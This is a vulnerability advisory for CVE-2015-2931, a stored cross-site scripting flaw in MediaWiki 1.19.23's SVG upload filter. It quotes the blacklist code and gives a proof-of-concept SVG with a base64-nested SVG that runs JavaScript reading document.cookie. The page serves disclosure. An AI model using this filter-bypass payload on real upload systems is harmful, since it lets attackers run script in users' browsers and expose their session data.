MediaWiki 1.19.23 Stored XSS in SVG via embedded SVG

2015.04.13
Credit: csteipp
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2015-2931
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

When uploading an SVG file, it is possible to bypass the validation filters and upload an SVG file that executes JavaScript when rendered. The SVG validation is a blacklist-based approach and contains protections against numerous techniques for embedding JavaScript in SVG files; however, the protections against nested SVG files are inadequate due to a missing MIME type blacklist. Specifically, data: URIs with the image/svg or text/xml formats are blacklisted, but the application/xml MIME type is sufficient to create a nested SVG file with JavaScript code. # /includes/upload/UploadBase.php # href with embedded svg as target if ($stripped == 'href' && preg_match( '!data:[^,]*image/svg[^,]*,!sim', $value)){ wfDebug( __METHOD__ . ": Found href to embedded svg " . "\"<$strippedElement '$attrib'='$value '...\" in uploaded file.\n" ); return true;} # href with embedded (text/xml) svg as target if ( $stripped == 'href' && preg_match( '!data:[^,]*text/xml[^,]*,!sim', $value)){ wfDebug( __METHOD__ . ": Found href to embedded svg " . "\"<$strippedElement '$attrib'='$value '...\" in uploaded file.\n" ); return true;} Listing 1: Blacklist filtering for data: URIs with specific MIME types. The following example SVG file contains a nested SVG file embedded within a data: URI. The nested SVG file contains executable JavaScript. <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <use xlink:href="data:application/xml;base64 , PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5r PSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj4KPGRlZnM+CjxjaXJjbGUgaWQ9InRlc3QiIHI9I jUwIiBjeD0iMTAwIiBjeT0iMTAwIiBzdHlsZT0iZmlsbDogI0YwMCI+CjxzZXQgYXR0cmlidXRlTm FtZT0iZmlsbCIgYXR0cmlidXRlVHlwZT0iQ1NTIiBvbmJlZ2luPSdhbGVydChkb2N1bWVudC5jb29r aWUpJwpvbmVuZD0nYWxlcnQoIm9uZW5kIiknIHRvPSIjMDBGIiBiZWdpbj0iMXMiIGR1cj0iNXMiIC 8+CjwvY2lyY2xlPgo8L2RlZnM+Cjx1c2UgeGxpbms6aHJlZj0iI3Rlc3QiLz4KPC9zdmc+#test"/> </svg> Listing 2: Specially-crafted SVG file with a nested SVG file containing executable JavaScript code. During testing, this exploit was only confirmed against the Firefox browser. Testing indicates that other browsers do not support nested SVG files

References:

https://phabricator.wikimedia.org/T85850


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top